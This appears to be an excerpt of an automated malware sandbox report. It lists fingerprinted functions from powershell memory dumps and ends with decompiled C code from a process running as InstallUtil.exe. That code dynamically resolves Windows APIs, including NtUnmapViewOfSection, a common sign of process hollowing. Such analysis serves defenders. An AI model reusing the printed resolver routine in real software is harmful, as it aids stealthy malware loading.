Instruction Fuzzy Hash: 4721D2B0A042849FDB10EB78C855BEE77B1FF84718F500569D502EB290EB759F84CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0070F3A4 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 356be99353f9072d0ac04d457d326a65f66c1cb3f19faff6b4bef4a380924781
Instruction ID: f95a351efe3f0ea1248591acaf407bef228c3268065006f25cf512b18c7ead32
Opcode Fuzzy Hash: 356be99353f9072d0ac04d457d326a65f66c1cb3f19faff6b4bef4a380924781
Instruction Fuzzy Hash: 852124B1504280DFCF14CF50D8C0B27BBA1FB88314F24C6B9ED094A686C33AD856CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0070EFF8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2992b2367b654c0df111459805c3a82a4f1dc73f3fc4bce98f765cf24417c5a
Instruction ID: a19a22dccf2a5e3153a919ad7417c6a5258a249ed312815c2b75c660a698a69e
Opcode Fuzzy Hash: e2992b2367b654c0df111459805c3a82a4f1dc73f3fc4bce98f765cf24417c5a
Instruction Fuzzy Hash: 7C21C5B5504244DFDB24CF24D9C4B26BBA5FB88314F24CAB9D9094B787C37AD846CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00C82082 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54705569cea2fea839059647f145b7259f8666283548ad6e56df4e0d4f1faf53
Instruction ID: 218d14a8a4ff9344500d1cc799c326c1ce01fae6f0b9c79cb886f727b8f4dbe0
Opcode Fuzzy Hash: 54705569cea2fea839059647f145b7259f8666283548ad6e56df4e0d4f1faf53
Instruction Fuzzy Hash: 7E213D302047448FC354EB36C454A6B77E2FF81308F16896DD19ACB261EF76AE41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C82090 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9531180b82ecf94cf27a9895a02c45b44f8691f0c42037ddc53e09836e2770b0
Instruction ID: 7c367f036c5a8f7ddce58a673b3a0e322965b9beea0b505b68ed39bd6dc98852
Opcode Fuzzy Hash: 9531180b82ecf94cf27a9895a02c45b44f8691f0c42037ddc53e09836e2770b0
Instruction Fuzzy Hash: 59210B302046048FC754EB36C454AAB73E6FF85308F56896CD19A8B260EF35AD81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C8FBE9 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 329987825fd65eab796ffef1062086d33ac024cb63d894a0adf1b3ac7fe29488
Instruction ID: 34719c097821dcf9e230b3008d989b54fd66c1e5ed42232569300fb26a74e1e1
Opcode Fuzzy Hash: 329987825fd65eab796ffef1062086d33ac024cb63d894a0adf1b3ac7fe29488
Instruction Fuzzy Hash: F411E13260D3848FC7269B25DC547AABFE09F82305F0985BFD894CB192D6388A19D762

Uniqueness

Uniqueness Score: -1.00%

Function 0070F39F Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b13040e2974110599f9aaf459f51fdf3b27c68673fce204dffde1a99c494d18
Instruction ID: a531b8ad28a21825846e6108d66489fbed646b4a30006854d6b197edc54dc6b2
Opcode Fuzzy Hash: 2b13040e2974110599f9aaf459f51fdf3b27c68673fce204dffde1a99c494d18
Instruction Fuzzy Hash: A521AE75504280DFCB15CF50D5C4B16BFA2FB48314F24C6A9ED494A696C33AD82ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C81191 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 58731ce44cab0c27e42c2bc16b6b45838c53be6248ad61203fbc4b4a1fc2d085
Instruction ID: e98a51d53a7a18e4591ae43e0299f020a18fe68238f87f830994bb751ba81b38
Opcode Fuzzy Hash: 58731ce44cab0c27e42c2bc16b6b45838c53be6248ad61203fbc4b4a1fc2d085
Instruction Fuzzy Hash: 6A11C63130464157D714EB3AD4945EF72DAAFD235CB098A3DE92ACB680EF60AE4547C4

Uniqueness

Uniqueness Score: -1.00%

Function 00C84D0F Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2c918db8b0dcd3a8ced5d37d71868ee832ce4004a72f4e9901f9743496e2b0c
Instruction ID: 428f374bc23e6887e22a1c4ab67d8ede4eccbc59796db220661ad6f95a624816
Opcode Fuzzy Hash: a2c918db8b0dcd3a8ced5d37d71868ee832ce4004a72f4e9901f9743496e2b0c
Instruction Fuzzy Hash: 3911D822B182575BFB7C7A76D4043BA2AC18F8174DF1848BFC456CB6D1DA5DCD808399

Uniqueness

Uniqueness Score: -1.00%

Function 00C84C58 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cab951e55b5c2f551c3d09c023abdaf645aac9d4aa7d6c26dc422e522faed5ce
Instruction ID: 6322b4dea63a70c7726787180c543535dbe709778820c657367b16ad7c54a684
Opcode Fuzzy Hash: cab951e55b5c2f551c3d09c023abdaf645aac9d4aa7d6c26dc422e522faed5ce
Instruction Fuzzy Hash: 0B1112B5D052198FCB14DFAAD884BDEFBF8FB89314F14816AD808BB204D7749944CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C84C57 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6f5c818909a0f4b4af79a0371c8895aa5a57223986430292a1d8b26e9bb55c6
Instruction ID: 1096d8561b899f598e0f96c54a12a3f033521beea5a85e1bef361b70c0f367e3
Opcode Fuzzy Hash: e6f5c818909a0f4b4af79a0371c8895aa5a57223986430292a1d8b26e9bb55c6
Instruction Fuzzy Hash: 722130B4C052598FCB14CFAAD884BDEFBF4BB88314F14816AD808BB200C3749944CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 0070EFF3 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec7624ac04d83d1b1af5878c263662589a703ee498abf29b069cff616764cafa
Instruction ID: 19a076f59962d349cf3e1c23af33f2107520197e33406521287ab7ba916464f7
Opcode Fuzzy Hash: ec7624ac04d83d1b1af5878c263662589a703ee498abf29b069cff616764cafa
Instruction Fuzzy Hash: 6A11BB75504280CFDB21CF20D5C4B15BBA1FB84314F28C6AAD8494B697C33AD84ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 00C85370 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d76f75e75f87abb50389d0a74faec58e68d46ca04a56680526aa6c61fa1ee2fe
Instruction ID: 9226837093dff1f4cd1b40f62a2941780d728f230f1b6700e0ced021cd49e723
Opcode Fuzzy Hash: d76f75e75f87abb50389d0a74faec58e68d46ca04a56680526aa6c61fa1ee2fe
Instruction Fuzzy Hash: 63F0A4373046245FD7249BACE880AAFB3A9EBC8769B11053AE509C7351DFB2DC028794

Uniqueness

Uniqueness Score: -1.00%

Function 00C846C7 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c120d83ccec5e23222fe8cca4c14e085ac211705cd0159ffab3ce821389359ad
Instruction ID: 99de0eb877dfc294f822a3b9aef75473829db3e6823ec8ee014f5f0cb608d481
Opcode Fuzzy Hash: c120d83ccec5e23222fe8cca4c14e085ac211705cd0159ffab3ce821389359ad
Instruction Fuzzy Hash: AA118E70B046028BCB18EB74C1156AE7BE2AF85308F188928D456EB390EF79DD45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00C846E2 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0026c9b5bc230b0a5d2b60942a54e6a1bdcaba3a6e2e0448d34961a6f80abf51
Instruction ID: 7b6533f38799c0caa6ff3c8426a8bd200cb9e263fe9273af2933f504c098d946
Opcode Fuzzy Hash: 0026c9b5bc230b0a5d2b60942a54e6a1bdcaba3a6e2e0448d34961a6f80abf51
Instruction Fuzzy Hash: F3118E70B042018BCB18EB74C1156AE7BE2AF85308F188928D456EB394EF79DD44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0070D01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8592857d7ba317f4e5de47ee4a11210b0750fd06196ced3bbf9521c40f5f1298
Instruction ID: 2c3d52d7b7eecc782229fec65934a4481eb5a6f52f9b6c15d0b4205581ca3ecd
Opcode Fuzzy Hash: 8592857d7ba317f4e5de47ee4a11210b0750fd06196ced3bbf9521c40f5f1298
Instruction Fuzzy Hash: EA01F77050C340DAE7304A66CC84B66BFD8EF41364F18865AED485B2C6C37D9D45C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00C8536B Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2e4c11f9c2647a2e548bf400a6a97f19d09bf2edc9bef571161d8a78007f52
Instruction ID: 01f46e01251785009b30d30c23e37f8629b62e102d2b1539c0e4b4bddfa0bcb2
Opcode Fuzzy Hash: 9f2e4c11f9c2647a2e548bf400a6a97f19d09bf2edc9bef571161d8a78007f52
Instruction Fuzzy Hash: 03F0C2323041205FC7249B68D880AAF77A9EBC8765B15456AE50ACB391CFB1DC02CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0070D01C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.522948569.000000000070D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0070D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c7d80eb50b57c62bb22113f9eb6a69ba68e9ac6dd0168a6c7b86a8d86f51748
Instruction ID: 69c66653f88bbe5415fb09091094e39c9e85243fc57feead6754d13548098232
Opcode Fuzzy Hash: 6c7d80eb50b57c62bb22113f9eb6a69ba68e9ac6dd0168a6c7b86a8d86f51748
Instruction Fuzzy Hash: 2BF06271408384AEE7208A16CC84B66FFD8EF41724F18C55AED485B6C6C3799C45CAB1

Uniqueness

Uniqueness Score: -1.00%

Function 00C83CAA Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5aca463054fa8466ee07f19fd68311fea6308d22ab95fd7e712620501c510c8
Instruction ID: 3c94d60d7465f9096a521fbed70803809921e51b9d4e3bbb386f5d9bb755ef50
Opcode Fuzzy Hash: a5aca463054fa8466ee07f19fd68311fea6308d22ab95fd7e712620501c510c8
Instruction Fuzzy Hash: E6F08C343005408FCB88ABBCD018A6E33E2EFD970870145B8F206CFBA0DE26DC018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C82178 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c05566c7e033b5f86d564cc15ee94db2a3bed5049c931d219c03c5c83e19b86b
Instruction ID: 860751842b6da3c5eb12940f9863ea4bedf73e72e0be982a1ff5488d6a17fbf8
Opcode Fuzzy Hash: c05566c7e033b5f86d564cc15ee94db2a3bed5049c931d219c03c5c83e19b86b
Instruction Fuzzy Hash: 78F017B1C042098FCF64DFBA88492EEBFF1BF59204F20426EC419E2250E3790641CF95

Uniqueness

Uniqueness Score: -1.00%

Function 00C823EA Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95dcbe2b1489544d702b2ca800729386087ffcb688c0eb56c777fe253bb18dee
Instruction ID: bda9583371b49a1d19a2ee6460b5a6179c562e725b954437c536076281f70fc6
Opcode Fuzzy Hash: 95dcbe2b1489544d702b2ca800729386087ffcb688c0eb56c777fe253bb18dee
Instruction Fuzzy Hash: 64F058352059448FC3A4E778D458ABA6BDADB85315F160A2DE10ACB2A1CF609D828BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C823F0 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5df83a66fc49d12543febf90446980ef6726ec75c4ecb3f244ad48ba7a41c7ea
Instruction ID: 9267fd77f9eed4213d5126b1acc6419396c6178f5097ef41c614708546ed936b
Opcode Fuzzy Hash: 5df83a66fc49d12543febf90446980ef6726ec75c4ecb3f244ad48ba7a41c7ea
Instruction Fuzzy Hash: 98F0A0352059048FC350E779D448BAE73DADBC5315F060929E20ECB3A1CF20AD8187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00C82188 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e70a459037645023ded3bc1580ab944e92fbe8f00d882cad4a3e95c7e798e37
Instruction ID: feba14a2fd5243235b5c879decc1f9b7727b3574442c26c3c4be4b4cd475dba2
Opcode Fuzzy Hash: 3e70a459037645023ded3bc1580ab944e92fbe8f00d882cad4a3e95c7e798e37
Instruction Fuzzy Hash: 7BF09BB0D0421D9FCF58EFAA88452EEBBF1BB48305F20816AC418B2650E7384A41CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00C821EC Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae513fdf112d6d5631af043d9854b69222851f9eb70d09dc0b9e9066d330e596
Instruction ID: 8821a8ed47ef588b0a76d41d63adeadf1ff2601c74697170d077881723d98b40
Opcode Fuzzy Hash: ae513fdf112d6d5631af043d9854b69222851f9eb70d09dc0b9e9066d330e596
Instruction Fuzzy Hash: 48E0867194D398CFDF119BB58C4D1AC7B70FB1734EF1402EEC442AA561E3298981D765

Uniqueness

Uniqueness Score: -1.00%

Function 00C823AB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bad0c2793bac9368486371b01d3b74da01dac6e542b1fa44cf6a23c17b4a4ae6
Instruction ID: 7a2ce0863b50f04b492fe7bce8ece857cbfcb3fda93f8d27602e96ea7bac5f8f
Opcode Fuzzy Hash: bad0c2793bac9368486371b01d3b74da01dac6e542b1fa44cf6a23c17b4a4ae6
Instruction Fuzzy Hash: 83E0C239200150CFC3019B34F448EF93BA5EF49310B0502A9F80DC7372C6648C018F61

Uniqueness

Uniqueness Score: -1.00%

Function 00C82863 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3246748b33b6082b1d8992d25520ee365dc147101b77ed2285c59e02cdef867
Instruction ID: 0fb85dfa242e13566eb2c52e3b58edd471ccc5c07d0a15b1d780ad79f14cb28f
Opcode Fuzzy Hash: d3246748b33b6082b1d8992d25520ee365dc147101b77ed2285c59e02cdef867
Instruction Fuzzy Hash: F8E020346052488FCB059B70E8A5A7D3F57FBC9311F101538F806D33A1CF2508018F50

Uniqueness

Uniqueness Score: -1.00%

Function 00C86087 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8963e3b5358b43e507cd30c02d76999edaed8535270b2ad5da75b0ab8c24b84c
Instruction ID: a79701112f971a51e5fb5eb166d42ab9e4bab722d5a8ff236348ac4b97430908
Opcode Fuzzy Hash: 8963e3b5358b43e507cd30c02d76999edaed8535270b2ad5da75b0ab8c24b84c
Instruction Fuzzy Hash: F3D0126B3000641F9511529A7C9497AEB9DE2DE6673544177FA45C6250C5788E0193A4

Uniqueness

Uniqueness Score: -1.00%

Function 00C82868 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebd81e53b491416b183b001c7f35c58b1d51790767177b08978b653c30c2cdd3
Instruction ID: 4686d56d70c34f1ab79413be66d13c2962fbd701ee9a7795fbbf6d97c31cc3bc
Opcode Fuzzy Hash: ebd81e53b491416b183b001c7f35c58b1d51790767177b08978b653c30c2cdd3
Instruction Fuzzy Hash: 16E08C346112088BCB046BA0E8A9A3E3B9BFB89326B015834B805873A1CF255C018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C8600A Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f81a5a4acf9ef58694cb43678508189a809b69b3b6ca55af1b051c7d40d69851
Instruction ID: 62aa7c71649ef80e19e183293a58b81dbbff796399218b251429757e66556052
Opcode Fuzzy Hash: f81a5a4acf9ef58694cb43678508189a809b69b3b6ca55af1b051c7d40d69851
Instruction Fuzzy Hash: 94D012A73000606B561012D9785497EAADED6CB666314813BFA45C3280C8398E4253B0

Uniqueness

Uniqueness Score: -1.00%

Function 00C823B0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd4e967e126da5e1d6b6cd557156f997469bdac640d2e4ddbe08c38679c38df8
Instruction ID: 81fb1380ade3778e3132e5181c282e0d6494ccfe866aa14b433ec658bcf7181a
Opcode Fuzzy Hash: cd4e967e126da5e1d6b6cd557156f997469bdac640d2e4ddbe08c38679c38df8
Instruction Fuzzy Hash: 62D05E35200214DFC300AB68E848EA97BA9EB49725B0241A5F90DC7372CB259C018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C8236F Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b1a6eca208236ad7c57d8d0f833bde353e6704c173d08fb1d5ba958e5e0b997
Instruction ID: fda402439be6636ecc770fa9b15e96766f2918ef90fd7a9a848420491dac3f66
Opcode Fuzzy Hash: 2b1a6eca208236ad7c57d8d0f833bde353e6704c173d08fb1d5ba958e5e0b997
Instruction Fuzzy Hash: D6D0A7304093809FCB011770B81D7AE3F60CB42215F01017AE00BD25B3CF2548808F01

Uniqueness

Uniqueness Score: -1.00%

Function 00C82370 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed5b9d8fcdb3b889a7c69c3309e26184373fad36fc394385c5299389bcf0469c
Instruction ID: d46f47522512b61ca0e7b3135da5907e92ed225d3ff1ec58b6d18e6d9a5c4849
Opcode Fuzzy Hash: ed5b9d8fcdb3b889a7c69c3309e26184373fad36fc394385c5299389bcf0469c
Instruction Fuzzy Hash: 09D0C9305053459BDB052770B81D76E3AA8DB8222AF414076A10E965A3CF2959808F51

Uniqueness

Uniqueness Score: -1.00%

Function 00C85352 Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.523550158.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c1c3720a69df231a41694c80baff1e9af9fa21ec1a4825c4c7f70c953d3d52a
Instruction ID: 952d0a91187c5a7089aba21c86369bc9f4a90d23dbb2fa4c5081d87ce384c99b
Opcode Fuzzy Hash: 6c1c3720a69df231a41694c80baff1e9af9fa21ec1a4825c4c7f70c953d3d52a
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: InstallUtil.exePID: 6528, Parent PID: 6232COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.2%
Total number of Nodes:	1220
Total number of Limit Nodes:	44

Executed Functions

Function 0040CE58 Relevance: 91.1, APIs: 30, Strings: 22, Instructions: 110
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040CE58() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t26;
				CHAR* _t34;
				CHAR* _t35;
				CHAR* _t36;
				CHAR* _t37;

				_t34 = "GetModuleFileNameExA";
				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, _t34);
				 *0x46dd24 = _t2;
				if(_t2 == 0) {
					 *0x46dd24 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t34);
				}
				_t35 = "GetModuleFileNameExW";
				 *0x46dd14 = GetProcAddress(LoadLibraryA("Psapi.dll"), _t35);
				if( *0x46dd24 == 0) {
					 *0x46dd14 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), _t35);
				}
				 *0x46dd1c = GetProcAddress(LoadLibraryA("ntdll.dll"), "NtUnmapViewOfSection");
				_t8 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				_t36 = "kernel32";
				 *0x46dd08 = _t8;
				 *0x46dea0 = GetProcAddress(GetModuleHandleA(_t36), "IsWow64Process");
				 *0x46dea4 = GetProcAddress(GetModuleHandleA(_t36), "GetComputerNameExW");
				 *0x46dd18 = GetProcAddress(LoadLibraryA("Shell32"), "IsUserAnAdmin");
				_t16 = GetProcAddress(GetModuleHandleA(_t36), "SetProcessDEPPolicy");
				_t37 = "user32";
				 *0x46dd0c = _t16;
				 *0x46dd28 = GetProcAddress(GetModuleHandleA(_t37), "EnumDisplayDevicesW");
				 *0x46dd2c = GetProcAddress(GetModuleHandleA(_t37), "EnumDisplayMonitors");
				 *0x46dd10 = GetProcAddress(GetModuleHandleA(_t37), "GetMonitorInfoW");
				 *0x46deac = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetSystemTimes");
				_t26 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x46dd04 = _t26;
				return _t26;
			}

0x0040ce62
0x0040ce6d
0x0040ce76
0x0040ce7e
0x0040ce85
0x0040ce92
0x0040ce92
0x0040ce97
0x0040ceae
0x0040ceb3
0x0040cec0
0x0040cec0
0x0040cede
0x0040cee6
0x0040ceed
0x0040cef2
0x0040cf03
0x0040cf17
0x0040cf27
0x0040cf2f
0x0040cf36
0x0040cf3b
0x0040cf4c
0x0040cf5c
0x0040cf70
0x0040cf81
0x0040cf89
0x0040cf8e
0x0040cf94

APIs

LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0046E600,0046E5D0,?,00000001,0040C650), ref: 0040CE6D
GetProcAddress.KERNEL32(00000000), ref: 0040CE76
